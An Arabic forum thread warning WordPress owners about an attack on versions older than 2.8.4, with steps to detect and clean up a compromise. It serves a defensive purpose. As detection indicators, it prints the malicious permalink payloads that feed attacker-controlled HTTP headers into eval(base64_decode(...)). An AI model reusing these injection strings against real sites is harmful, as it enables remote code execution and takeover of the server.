النتائج 1 إلى 7 من 7

الموضوع: إكسبلويت جديد للورد برس 0-d4y 2 - تحذير

  1. #1
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316

    Arrow إكسبلويت جديد للورد برس 0-d4y 2 - تحذير



    الســــلام عليكمم ورحمة الله وبركاته شباب,,,



    توني قريا خبر "تحذير" من موقع الوورد برس الغني عن التعريف بتحديث بيانات جميع مستخدمين الوورد برس, سواء كأدمن - يوزر , حيث اعربوا بأن مستخدمين الوورد برس يتعرضون لهذا النوع من الإكسبلويت كل ساعه ! حيث يقوم المخترق بزع عضوية الأدمن عند تسجيله بلمدونة فقط !

    Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!!

    Update your WordPress blog before you continue reading this post. That’s how critical this issue is.
    للوقاية من الثغره:

    1- تحديث مدونتك الان, الإكسبلويت "0-d4y" يعمل على جميع إصدارات الوورد برس إلا 2.8.4 .
    2- إصدار تقرير من الوورد برس : كيفية الحفـــاظ على مدونتك امنة, بلإضافة الى معلومات حول كيفية عمل تحديث فوري لمدونتك لإيقاف هذه الإكسبلويت ( وورم ).
    3- إذا كنت تستخدم إصدار وورد برس رقم 2.7 سوف يظهر لك عند دخولك لوحة التحكم تحذير لتحديث مدونتك لأخر إصدار, وبحالة كنت تستخدم نسخة اقدم من 2.7 فوجب عليكم التحديق حالا, بحالة لم تستطع معرفة إصدار مدونتك,, وجب عليكم التحديث عبر الموقع الرسمي للورد برس من هنـــا حالا.
    4- إستخدام إضافة وورد برس لحماية مدونتك: هذه الحالة ستكون إستثنائية لك بعد "تحديثك حاليا" لإصدار مدونتك, لاكن يوجد بعض الإضافات تساعدك بحماية مدونتك من التعليقات وغيرها من الامور المهمة,, لاكن بحالة عدم ترقية مدونتك, وجب عليكم الترقية الأن.
    5- وورد برس غير أمن: برنامج وورد برس مامن بلحماية البرمجية والشكلية بنحو 97% من قبل خبيرين برمجة امنية للمواقع وتطويرات الويب, لاكن لايوجد برنامج على وجه الارض الا وتعرض للإختراق, وهذا الهجوم كان متوقع من قبل ! لاكن بإصدار وورد برس 2.8.4 تم ترقيعه بأمان ! وبحالة وجد او ظهر اي ثغره جديدة سواء خطيرة ام لا, ستقوم وورد برس بإعلام اعضائها على الترقيع بلحظات قليلة من قبل الخبرات بلتطوير والترقيع الامني المعد لها, حيث تملك وورد برس اكثر من 5,317,360 مليون مشترك بلعالم !
    6- التخوف او الملل من التحديث حالا: إن هذا التحديث مطلوب من جميع اعضاء وورد برس, حيث ان هذه الثغره تعتبر قاتلة لمدونتك, فوجب عليكم الترقيع حالا وان لاتأجل الترقيع حتى وقت الإختراق ! ويفضل ايضا التاكد من تحديث إضافات الوورد برس لديك "إن وجد تحديث لها" حالا .

    بحالة وجد تحديثات للوورد برس, فسيتم كتابة تحديث للموضوع داخل موضوعنا هذا لمنتدى سيكيورتي رولز, وسيتم إبلاغ اعضائنا بنفس اللحظة.

    * اللحين معظم الشباب ومالكين المواقع الي يستخدمون الوورد برس يتسالون عن مدوناتهم ؟ هل هي مخترقة او لا ؟

    اولا: يتم الإختراق عن طريق ثغره ( برايفت ) يتم تحديث معلومات العضو المسجل ( المخترق ) بحيث يصبح بمرتبه الأدمن ( المستهدف ) فللتاكد منها وجب عليكم الذهاب الى لوحة الأدمن, والتاكد من وجود عضويتك فقط ! فإن وجدت عضوية اخرى "تجهل صاحبها" فأنت مخترق ووجب عليكم إيقاف موقعك حالا, والافضل ان تغير مسار ملفاتك لمسار اخر "مؤقتا" والتاكد من نظافة ملفاتك من اي "كود خبيث" او "شل كود" بهم ,,وبعدها يقوم المخترق "بحالة عدم تاكدك او ترقيعك للمدوتة" بلولوج لمعلومات مهمة بموقعك مثل معلومات بريدك الإلكتروني إن كنت تحتفظ به بلمدونة, معلومات شخصية ومواضيع شخصية اخرى, ويمكنه ايضا من إختراق مدونتك بنفس اللحظة عن طريق رفع " شل كود " لمدونتك والتحكم بلموقع كامل ! وإن كانت إستضافتك ذات حماية عادية او متوسطة, وذالك يعتمد على المخترق, فيتم إختراق سيرفرك كامل من هذه الثغره, فنتمنى التحديث الفوري اللحين لمدونتك لحماية موقعك ومدونتك وسيرفرك ايضا !

    صورة توضيحية


    ثانيا: التاكد من "روابط دائمة" مدونتك ! مثال

    كود:
    %&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
    او


    “/%&(%
    كود:
    7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
    او


    كود:
    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    هذه الأكواد هي عباره عن تشفير نوع "Eval" و “base64_decode” , يمكن المخترق من رفع شل كود لموقعك ( سيرفرك ) وإختراقك كامل.

    فوجب عليكم إتباع النقطة الاولى الي ذكرتها من قبل, وإن تم وجودهم وجب عليكم حذفهم من "الروابط" بلوحة تحكمكم.


    ثالثا: التاكد من عدم وجود "أدمن" إضافي بلوحة التحكم,, معظم الاوقات لإصدارات الوورد برس القديمة 2.7 واقدم ,, يوجد بعض الهاكات "تخفي" الأعضاء سواء أدمن او يوزر,, فتستطيع من خلال الذهاب للوحة التحكم ومن ثم الأعضاء إختيار السورس كود للصفحة والبحث فيها عن Administrator او Admin او user_ ,, فبحالة عدم وجود شي فإن شاء الله انت بامان,,,

    صورة توضيحية


    اللحين بعد المرور بكل هذه التوضيحات ماتوقع بإذن الله وجود اي سؤال او إستفسار لحد من الشباب,, ولاكن لو وجد فإن شاء الله نحلها لكم,,, لاكن بحالة "لاسمح الله" تم إختراق مدونتكم, او العبث بلقاعدة (شي اكيد المخترق راح يقوم بلعبث بلقاعدة, او رفع شل او اي شي اخر يبقيه علموقع ( Backdoor ) له,,, فلحل الافضل والأمن لكم هو تحميل هذه الإضافة للورد برس WordPress-to-WordPress Import WordPress Plugin ومن ثم عن طريقها ( بعد تثبيتها ) نقوم بإستخدام Export ( ضغط وتحميل ) معلومات مدونتنا من ( ردود - صور - ملفات - مواضيع ) كملف XML وحفظة بجهازنا , ومن ثم نقوم بتامين ( صور المدونة وملفاتنا إن وجدت ) وهذه المسارات عادة تكون داخل المدونة

    كود:
    /home/username/public_html/wp-content/uploads
    او

    كود:
    /home/username/public_html/images
    بلحالة هذه بعد الحفظ نقوم بحذف المدونة ( كاملة ) ومن ثم تصطيب مدونة جديدة من هذا الرابط ( الإصدار الاخير للوررد برس 2.8.4 - إضغط هنا ) , ومن ثم بعد التركيب نقوم بتركيب الإضافة الي قمنا بسحب معلومات مدونتنا فيها, ومن ثم نقوم بلضفط على Import للملف الي سحبناه من المدونة.

    وبإذن الله ترجع المدونة 100% نظيفة من اي شل كود او كود خبيث من المخترق , وايضا من اي ( شك ) بنفسنا بعد الإختراق .

    للتقليل من إختراق المدونات ( يرجى ) من الجميع نشر الخبر وتحذير كل مالك مدونة من هذه الإكسبلويت عبر هذا الموضوع او منكم شخصيا ( مسنجر او منتدى ),, بحيث تقلل من هذه الإختراقات لمدونات الوورد برس,, وبحالة وجود اي شي إضافي هذا الدعم الفني
    ( برنامج الوورد برس من هنا ).

    الثغره ( الكود ) لم يتم الإعلان عنها بمواقع الحماية حاليا ,,, مثل ماقلت قبل الثغره اكيد برايفت مازالت, واتوقع صعب تظهر للجميع حاليا.

    روابط لها صلة بلموضوع

    How To Completely Clean Your Hacked WordPress Installation
    Journey Etc. has a possible solution
    WordPress-
    to-WordPress Import WordPress Plugin


    ----

    المصـــــدر

    تحياتي
    سيكيورتي رولز.





    __________________
    مشعل
    ze3ex@hotmail.com


  2. #2
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    118


    بارك الله فيك






  3. #3
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2008
    المشاركات
    5,069


    بارك الله فيك، طيب هل في ترقيع بدون الترقية الكاملة للمدونة؟
    مثلا بدي احافظ على الاصدار 2.7 لكن ما بدي ارقي هل هذا موجود؟






  4. #4
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316


    لا اخي,, الطريقة الي مشروحة مضمون إسترجاع مدونتك كاملة 100%,,, وقبل لا تبتدي فيها خذ باك اب كامل للموقع اذا تستعمل cpanel لترتاح من الشك,,,

    تحياتي.





    __________________
    مشعل
    ze3ex@hotmail.com

  5. #5
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2008
    المشاركات
    5,069


    انا مدونتي ليست مخترقة لكن القصد
    انا لا ارغب في التحديث لـ 2.8.4 لما بها من مشاكل النسخ من الوورد وهذا أمر يزعجني فعلاً

    هل يمكن لي تحميل ملفات معينة للترقيع؟






  6. #6
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316


    اخي الباك اب لموقعك بتضمن الملفات هذه فقط

    wpcontent
    wp-confing.php

    وباقي الملفات يجب حذفها,, لاكن مثل ماهو مشروح المفضل إستخدام السكربت وتحديث النسخة بشكل نظيف 100% لانه 100% الثغره شغاله على مدونتك كونك ماحدثتها للنسخة الاخير ( 2.8.4 ),,, فما اتوقع انك تنتظر يجيك طفل من هلاطفال ويخرب عليك شغلك ليوم كامل اذا مو اكثر !





    __________________
    مشعل
    ze3ex@hotmail.com

  7. #7
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2008
    المشاركات
    5,069


    اخي الباك اب لموقعك بتضمن الملفات هذه فقط

    wpcontent
    wp-confing.php

    وباقي الملفات يجب حذفها,, لاكن مثل ماهو مشروح المفضل إستخدام السكربت وتحديث النسخة بشكل نظيف 100% لانه 100% الثغره شغاله على مدونتك كونك ماحدثتها للنسخة الاخير ( 2.8.4 ),,, فما اتوقع انك تنتظر يجيك طفل من هلاطفال ويخرب عليك شغلك ليوم كامل اذا مو اكثر !

    تسلم اخي الكريم وسيتم التحديث حالاً










ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا|شقق للايجار في الكويت | بيوت للبيع في الكويت | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض